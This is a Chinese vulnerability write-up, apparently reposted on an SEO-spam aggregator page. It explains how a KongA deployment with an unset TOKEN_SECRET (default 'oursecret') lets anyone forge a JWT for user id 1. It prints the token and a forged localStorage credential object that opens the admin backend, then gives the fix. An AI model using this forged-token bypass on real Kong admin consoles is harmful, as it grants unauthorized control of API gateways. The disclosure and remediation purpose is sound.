当前位置: 首页 > news >正文

河南企业网站优化建筑工程公司黄页

河南企业网站优化,建筑工程公司黄页,wordpress 添加phpmyadmin,什么是空壳网站KongA 简介 KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga 。 KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置#xff0c;并且可以对于管理 Kong 节点 漏洞成因 未设置TOKEN_SECRE…KongA 简介 KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga 。 KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置并且可以对于管理 Kong 节点 漏洞成因 未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。 环境搭建 https://blog.csdn.net/qq_28284093/article/details/109611898 正常功能 login路由输入用户名密码登录 代码在https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/protocols/local.js#L71 验证用户名密码后会生成一个jwt的token。 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/controllers/AuthController.js#L294 从上图可以看到仅仅将user.id传入issue函数。 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/Token.js#L23 这里是漏洞的关键如果没有设置TOKEN_SECRET的话默认是oursecret。所以实战情况下漏洞场景还是存在的。 生成token之后将返回的json串存储在localStorage中作为凭证。 代码在 https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/assets/js/app/core/auth/services/AuthService.js#L105 攻击利用 先登录一下看看localStorage。 ngStorage-credentials对应login路由返回包内容 {user:{createdUser:null,updatedUser:1,node:{id:6,name:kong,type:default,kong_admin_url:http://172.30.0.3:8001,netdata_url:null,kong_api_key:,jwt_algorithm:HS256,jwt_key:null,jwt_secret:null,username:,password:,kong_version:2.5.0,health_checks:false,health_check_details:null,active:false,createdAt:2021-07-16T03:26:11.000Z,updatedAt:2021-07-16T03:26:11.000Z,createdUser:1,updatedUser:1},id:1,username:admin,email:adminadmin.com,firstName:null,lastName:null,admin:true,node_id:,active:true,activationToken:7c15366f-2f45-4d2d-93ed-ad57b03e09ba,createdAt:2021-07-16T03:21:14.000Z,updatedAt:2021-07-16T03:26:11.000Z},token:eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo} jwt解密一下看看 朴实无华user.id就是1 。第一个注册用户是1第二个注册用户是2。因为第一个用户往往是管理员用户所以实战情况下构造1的jwt即可。 下面构造任意用户的jwt eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo 构造凭证 {user:{createdUser:null,updatedUser:1,node:{id:1,name:admin,type:default,kong_admin_url:1,netdata_url:null,kong_api_key:,jwt_algorithm:HS256,jwt_key:null,jwt_secret:null,username:,password:,kong_version:2.5.0,health_checks:false,health_check_details:null,active:false,createdAt:1,updatedAt:1,createdUser:1,updatedUser:1},id:1,username:1,email:qqqq.com,firstName:null,lastName:null,admin:true,node_id:,active:true,activationToken:1,createdAt:1,updatedAt:1},token:eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo} 修改localStorage成功进入后台。 漏洞修复 部署时设置TOKEN_SECRET且值为不可爆破的字符串即可。
http://www.dnsts.com.cn/news/83586.html

相关文章:

  • 网站备案后有什么好处icp许可证
  • 遵义高端网站建设我的网站搜索不到了
  • 一元夺宝网站建设wordpress作者认证
  • 外贸汽车网站制作购物网站的设计
  • 营销型网站托管莱州网站设计
  • 域名注册哪个平台比较好东莞关键词优化排名
  • 国外网站设计 网址成都装修公司前十名
  • 电子商务网站建设内涵东台做网站哪家便宜
  • 济源做网站怎么收费免费app开发工具
  • 郑州企业建站免费咨询广州知名网站建设后台管理便捷
  • 苏州高端网站建设机构福建省建设工程信息网
  • 网站建设费是无形资产吗重庆排名前十的互联网公司
  • 上海专业网站建设网wordpress忘记后台账号
  • 正确建设企业网站福田服务商app软件安装
  • 企业的网站建设公司wordpress后台主题
  • 徐州网站优化推广团购网站建立
  • 汝城县网站建设公司南京外贸网站建设报价
  • 网站样式模板下载丽江网站开发找千素网
  • 创建网站要钱吗石家庄网站建设推广公司电话
  • 公司主页网站开发开发公司副总求职简历
  • 成功的营销网站怎样修改手机网站首页
  • 好网站建设公司选择哪家好360下载
  • 清远市网站建设宝山做手机网站建设
  • 宽屏大气企业网站源码河南网站建设运营域名注册公司
  • 视频网站怎么建设鄂州网站开发
  • 中国行业网站联盟秦皇岛网站制作代理商
  • asp.net mvc5网站开发绵阳网站搜索排名
  • wordpress网站换字体颜色国际形势最新消息
  • 郑州做网站哪家专业建站的步骤有哪些
  • 网站制作新手教程建婚恋网站需要多少钱